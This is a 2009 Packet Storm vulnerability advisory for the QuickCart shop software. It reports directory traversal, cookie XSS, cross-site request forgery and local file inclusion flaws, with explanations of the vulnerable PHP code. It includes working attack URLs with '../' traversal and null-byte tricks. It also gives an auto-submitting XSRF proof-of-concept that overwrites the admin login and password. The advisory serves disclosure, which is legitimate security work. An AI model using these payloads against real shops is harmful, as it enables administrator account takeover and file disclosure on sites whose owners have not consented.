QuickCart XSS / XSRF / LFI

2009-10-09T00:00:00
ID PACKETSTORM:81882
Type packetstorm
Reporter kl3ryk
Modified 2009-10-09T00:00:00

Description

                                        
                                            `DISCOVERED: Paweł 'kl3ryk' Łaskarzewski  
GREETZ: hawk, pin3ska, black ant_, qwert666, ua and gacmaan  
  
DIRECTORY TRAVERSAL  
http://victim.com/?p=[ONE OF THE EXISITING FILES]-[EXISITING ACTION IN  
THIS FILE]-  
Most of actions load templates form bad directory and then throw an exception.  
  
example:  
http://victim.com/?p=../actions_admin/settings-config  
#########################  
COOKIE XSS  
1) in login form in admin.php  
You need to change cookie "sLogin" and there put your XSS code. After  
that when you will go to http://revival.pl/test/quickcart/admin.php  
you will see your XSS executed.  
  
####templates/admin/loign.tpl  
<form method="post" action="$sLoginPage" name="form">  
<fieldset>  
<input type="hidden" name="sLoginPageNext" value="$_SERVER[REQUEST_URI]" />  
<div id="login"><label>$lang['Login']:</label><input type="text"  
name="sLogin" class="input" value="$_COOKIE[sLogin]" /></div> //XSS  
<div id="pass"><label>$lang['Password']:</label><input  
type="password" name="sPass" class="input" value="" /></div>  
<div id="submit"><input type="submit" value="$lang['log_in']  
»" /></div>  
</fieldset>  
</form>  
  
#########################  
XSRF for any admin action  
  
POC will change admin login and password in configuration file  
<form id="myForm"  
action="http://192.168.1.107/quickcart/admin.php?p=settings-config"  
method="post">  
<input type="text" name="sOption" value="save"/>  
<input type="text" name="login" value="admin2"/>  
<input type="text" name="pass" value="admin2"/>  
</form>  
<script>  
document.getElementById("myForm").submit();  
</script>  
  
#########################  
LFI  
In quick.cart there are two ways to pass parameters to the script:  
index.php?param1,param2,param3  
or  
index.php?p=param1-param2-param3  
  
In first case our LFI is in param3 in second filename is in param1.  
Unfourtuenetly both methods have contrains.  
First change all special chars (including dots into their safe  
equivalents) and change require that file must be inside  
actions_client directory.  
Secend one require from filename php extension  
  
example:  
http://victim.com/nothing,important,our.file.name.html%00  
http://victim.com/?p=../path.to.our.php.file-nothing-important  
  
EXPLANATION:  
####index.php:  
[CODE]  
extract( $_GET );  
[...]  
$aActions = isset( $p ) ? getAction( $p ) : getUrlFromGet( );  
[...]  
if( isset( $aActions ) && is_file( 'actions_client/'.$aActions['f'].'.php' ) )  
require 'actions_client/'.$aActions['f'].'.php';  
[/CODE]  
  
getUrlFromGet is function to handle first method and getAction to  
handle second one.  
  
  
####libraries/Trash.php  
[CODE]  
function getAction( $p ){  
global $a;  
if( ereg( '-', $p ) ){  
$aExp = explode( '-', $p );  
$iCount = count( $aExp );  
for( $i = 0; $i < $iCount; $i++ ){  
if( !empty( $aExp[$i] ) ){  
if( $i == 0 )  
$aActions['f'] = $aExp[$i];  
elseif( $i == 1 )  
$aActions['a'] = $aExp[$i];  
else{  
$aActions['o'.( $i - 1 )] = $aExp[$i];  
}  
}  
} // end for  
if( !empty( $aActions['f'] ) && !empty( $aActions['a'] ) ){  
$a = $aActions['a'];  
$aActions['sLink'] = '?p='.$p;  
return $aActions;  
}  
}  
}  
[/CODE]  
  
As we can see in our param string ereg search minus and because our  
filename is on first position we can't use null byte (%00) to pass  
filename without php extension.  
  
  
####core/common.php  
[CODE]  
function getUrlFromGet( ){  
global $a;  
if( isset( $_GET ) && is_array( $_GET ) ){  
foreach( $_GET as $mKey => $mValue ){  
if( strstr( $mKey, ',' ) ){  
$mKey = htmlspecialchars( $mKey );  
[/CODE]  
  
htmlspecialchars destroy our dreams about full LFI bug.  
`